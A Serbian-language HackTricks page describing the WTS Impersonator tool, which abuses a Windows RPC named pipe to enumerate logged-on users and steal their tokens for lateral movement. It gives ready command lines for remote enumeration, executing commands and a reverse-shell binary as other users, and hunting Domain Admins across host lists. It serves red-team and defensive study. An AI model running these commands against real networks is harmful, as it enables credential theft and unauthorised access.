hacktricks/windows-hardening/stealing-credentials/wts-impersonator.md
2024-04-06 19:39:21 +00:00

4.4 KiB

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Alat WTS Impersonator iskorišćava "\pipe\LSM_API_service" RPC Imenovane cijevi da tajno nabroji prijavljene korisnike i preuzme njihove tokene, zaobilazeći tradicionalne tehnike impersonacije tokena. Ovaj pristup olakšava neprimetno lateralno kretanje unutar mreža. Inovacija iza ove tehnike pripada Omri Baso-u, čiji rad je dostupan na GitHub-u.

Osnovna funkcionalnost

Alat funkcioniše kroz niz API poziva:

WTSEnumerateSessionsA  WTSQuerySessionInformationA  WTSQueryUserToken  CreateProcessAsUserW

Ključni moduli i upotreba

  • Nabrajanje korisnika: Alat omogućava lokalno i udaljeno nabrajanje korisnika, koristeći odgovarajuće komande za svaki scenario:
  • Lokalno:
.\WTSImpersonator.exe -m enum
  • Udaljeno, navođenjem IP adrese ili imena hosta:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • Izvršavanje komandi: Moduli exec i exec-remote zahtevaju Service kontekst za funkcionisanje. Lokalno izvršavanje jednostavno zahteva izvršnu datoteku WTSImpersonator i komandu:
  • Primer za lokalno izvršavanje komande:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • PsExec64.exe se može koristiti za dobijanje Service konteksta:
.\PsExec64.exe -accepteula -s cmd.exe
  • Udaljeno izvršavanje komandi: Uključuje kreiranje i instaliranje servisa na daljinu, slično kao PsExec.exe, omogućavajući izvršavanje sa odgovarajućim dozvolama.
  • Primer udaljenog izvršavanja:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • Modul za pronalaženje korisnika: Cilja određene korisnike na više mašina, izvršavajući kod pod njihovim akreditivima. Ovo je posebno korisno za ciljanje Domain Admins sa lokalnim administratorskim pravima na više sistema.
  • Primer upotrebe:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: